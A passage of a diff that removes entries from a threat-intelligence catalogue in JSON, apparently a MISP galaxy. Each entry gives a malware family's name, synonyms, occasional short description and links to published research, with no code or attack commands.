} - }, - { - "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", - "value": "XBot POS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" - ] - } - }, - { - "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", - "value": "ATMii", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" - ] - } - }, - { - "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", - "value": "jSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" - ] - } - }, - { - "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", - "value": "Salgorea", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" - ] - } - }, - { - "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", - "value": "Alureon", - "description": "", - "meta": { - "synonyms": [ - "TDL", - "Olmarik", - "TDSS", - "Pihar" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", - "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html" - ] - } - }, - { - "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", - "value": "SSHDoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" - ] - } - }, - { - "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", - "value": "QHost", - "description": "", - "meta": { - "synonyms": [ - "Tolouge" - ], - "type": [], - "refs": [] - } - }, - { - "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", - "value": "Mangzamel", - "description": "", - "meta": { - "synonyms": [ - "junidor", - "mengkite", - "vedratve" - ], - "type": [], - "refs": [ - 
"https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" - ] - } - }, - { - "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", - "value": "Punkey POS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", - "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" - ] - } - }, - { - "uuid": "82733125-da67-44ff-b2ac-b16226088211", - "value": "ONHAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" - ] - } - }, - { - "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", - "value": "Remexi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" - ] - } - }, - { - "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", - "value": "Velso Ransomware", - "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. 
", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" - ] - } - }, - { - "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", - "value": "Pykspa", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", - "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", - "https://www.youtube.com/watch?v=HfSQlC76_s4" - ] - } - }, - { - "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", - "value": "DistTrack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", - "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", - "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" - ] - } - }, - { - "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", - "value": "PAS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", - "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" - ] - } - }, - { - "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", - "value": "BTCWare", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" - ] - } - }, - { - "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", - "value": "AVCrypt", - 
"description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" - ] - } - }, - { - "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", - "value": "Sisfader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/" - ] - } - }, - { - "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", - "value": "Cryptowall", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" - ] - } - }, - { - "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", - "value": "SeaDaddy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] - } - }, - { - "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", - "value": "Zebrocy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" - ] - } - }, - { - "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", - "value": "Graftor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" - ] - } - }, - { - "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", - 
"value": "MiKey", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" - ] - } - }, - { - "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", - "value": "DarkHotel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", - "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", - "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", - "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" - ] - } - }, - { - "uuid": "503ca41c-7788-477c-869b-ac530f20c490", - "value": "SendSafe", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", - "value": "Multigrain POS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" - ] - } - }, - { - "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", - "value": "rdasrv", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" - ] - } - }, - { - "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", - "value": "Rurktar", - "description": "", - "meta": { - "synonyms": [ - "RCSU" - ], - "type": [], - "refs": [ - "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" - ] - } - }, - { - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ] - } - }, - { - "uuid": 
"e1fb348b-5e2b-4a26-95af-431065498ff5", - "value": "Nitol", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" - ] - } - }, - { - "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", - "value": "Zeus", - "description": "", - "meta": { - "synonyms": [ - "Zbot" - ], - "type": [], - "refs": [ - "https://zeustracker.abuse.ch/monitor.php", - "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", - "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", - "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", - "http://eternal-todo.com/blog/new-zeus-binary", - "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", - "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", - "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", - "https://www.mnin.org/write/ZeusMalware.pdf", - "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", - "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", - "http://eternal-todo.com/blog/zeus-spreading-facebook", - "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", - "http://eternal-todo.com/blog/detecting-zeus", - "https://www.secureworks.com/research/zeus?threat=zeus", - "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" - ] - } - }, - { - "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", - "value": "Simda", - "description": "", - "meta": { - "synonyms": [ - "iBank" - ], - "type": [], - "refs": [ - "https://secrary.com/ReversingMalware/iBank/" - ] - } - }, - { - "uuid": 
"c9915d41-d1fb-45bc-997e-5cd9c573d8e7", - "value": "MacSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" - ] - } - }, - { - "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", - "value": "Matrix Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", - "value": "Shifu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" - ] - } - }, - { - "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", - "value": "Slocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" - ] - } - }, - { - "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", - "value": "DanaBot", - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. 
", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0" - ] - } - }, - { - "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", - "value": "Jaff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2017/05/16/index.html", - "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", - "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" - ] - } - }, - { - "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", - "value": "CryLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", - "value": "MazarBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html", - "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/" - ] - } - }, - { - "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", - "value": "Cobian RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", - "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" - ] - } - }, - { - "uuid": "59717468-271e-4d15-859a-130681c17ddb", - "value": "Matrix Banker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" - ] - } - }, - { - "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", - "value": "HeroRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" - ] - } - }, 
- { - "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", - "value": "PowerWare", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" - ] - } - }, - { - "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", - "value": "FileIce", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" - ] - } - }, - { - "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", - "value": "Ice IX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", - "https://securelist.com/ice-ix-not-cool-at-all/29111/", - "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus" - ] - } - }, - { - "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", - "value": "Komplex", - "description": "", - "meta": { - "synonyms": [ - "JHUHUGIT", - "JKEYSKW", - "SedUploader" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://objective-see.com/blog/blog_0x16.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/" - ] - } - }, - { - "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", - "value": "Gozi", - "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. 
This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.", - "meta": { - "synonyms": [ - "Ursnif", - "Snifula", - "Gozi CRM", - "Papras", - "CRM" - ], - "type": [], - "refs": [ - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", - "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", - "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" - ] - } - }, - { - "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", - "value": "Gameover DGA", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", - "value": "Radamant", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" - ] - } - }, - { - "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/TKCERT/winnti-suricata-lua", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://github.com/TKCERT/winnti-nmap-script", - "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", - "https://github.com/TKCERT/winnti-detector", - 
"http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" - ] - } - }, - { - "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", - "value": "QRat", - "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", - "meta": { - "synonyms": [ - "Quaverse RAT" - ], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", - "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market", - "https://www.digitrustgroup.com/java-rat-qrat/" - ] - } - }, - { - "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", - "value": "Derusbi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", - "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", - "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" - ] - } - }, - { - "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", - "value": "Careto", - "description": "", - "meta": { - "synonyms": [ - "Appetite", - "Mask" - ], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] - } - }, - { - "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", - "value": "Triada", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", - "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", - "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", - 
"https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", - "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html" - ] - } - }, - { - "uuid": "c4490972-3403-4043-9d61-899c0a440940", - "value": "EquationDrug", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", - "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf", - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", - "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html" - ] - } - }, - { - "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", - "value": "elf.vpnfilter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", - "https://blog.talosintelligence.com/2018/05/VPNFilter.html", - "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", - "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware", - "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/" - ] - } - }, - { - "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", - "value": "Penquin Turla", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", - "https://twitter.com/juanandres_gs/status/944741575837528064", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf" - ] - } - }, - { - "uuid": "3afecded-3461-45f9-8159-e8328e56a916", - "value": "IDKEY", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://isc.sans.edu/diary/22766" - ] - } - }, - { - "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", - "value": "Catchamas", - "description": "", - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - } - }, - { - "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", - "value": "BillGates", - "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", - "https://habrahabr.ru/post/213973/", - "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf" - ] - } - }, - { - "uuid": "66781866-f064-467d-925d-5e5f290352f0", - "value": "Feodo", - "description": "", - "meta": { - "synonyms": [ - "Bugat", - "Cridex" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" - ] - } - }, - { - "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", - "value": "XSLCmd", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html" - ] - } - }, - { - "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", - "value": "Mamba", - "description": "", - "meta": { - "synonyms": [ - "HDDCryptor", - "DiskCryptor" - ], - "type": [], - "refs": [ - "https://securelist.com/the-return-of-mamba-ransomware/79403/", - 
"http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" - ] - } - }, - { - "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", - "value": "Downdelph", - "description": "", - "meta": { - "synonyms": [ - "DELPHACY" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" - ] - } - }, - { - "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", - "value": "AscentLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", - "value": "Mutabaha", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://vms.drweb.ru/virus/?_is=1&i=8477920" - ] - } - }, - { - "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", - "value": "UrlZone", - "description": "", - "meta": { - "synonyms": [ - "Shiotob", - "Bebloh" - ], - "type": [], - "refs": [ - "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", - "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", - "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", - "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", - "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", - "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" - ] - } - }, - { - "uuid": "ac2af862-34f4-4ced-9247-e3eeef1ad7d9", - "value": "WireLurker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - 
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] - } - }, - { - "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", - "value": "Chrysaor", - "description": "", - "meta": { - "synonyms": [ - "JigglyPuff", - "Pegasus" - ], - "type": [], - "refs": [ - "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", - "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", - "https://media.ccc.de/v/33c3-7901-pegasus_internals", - "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" - ] - } - }, - { - "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", - "value": "Cerbu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", - "value": "WannaCryptor", - "description": "", - "meta": { - "synonyms": [ - "Wana Decrypt0r", - "Wcry", - "WannaCry" - ], - "type": [], - "refs": [ - "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", - "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", - "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", - "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", - "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", - "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", - "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", - "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", - "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", - 
"https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", - "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", - "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", - "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", - "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" - ] - } - }, - { - "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", - "value": "Unidentified 013 (Korean)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" - ] - } - }, - { - "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", - "value": "Ordinypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", - "https://www.gdata.de/blog/2017/11/30151-ordinypt" - ] - } - }, - { - "uuid": 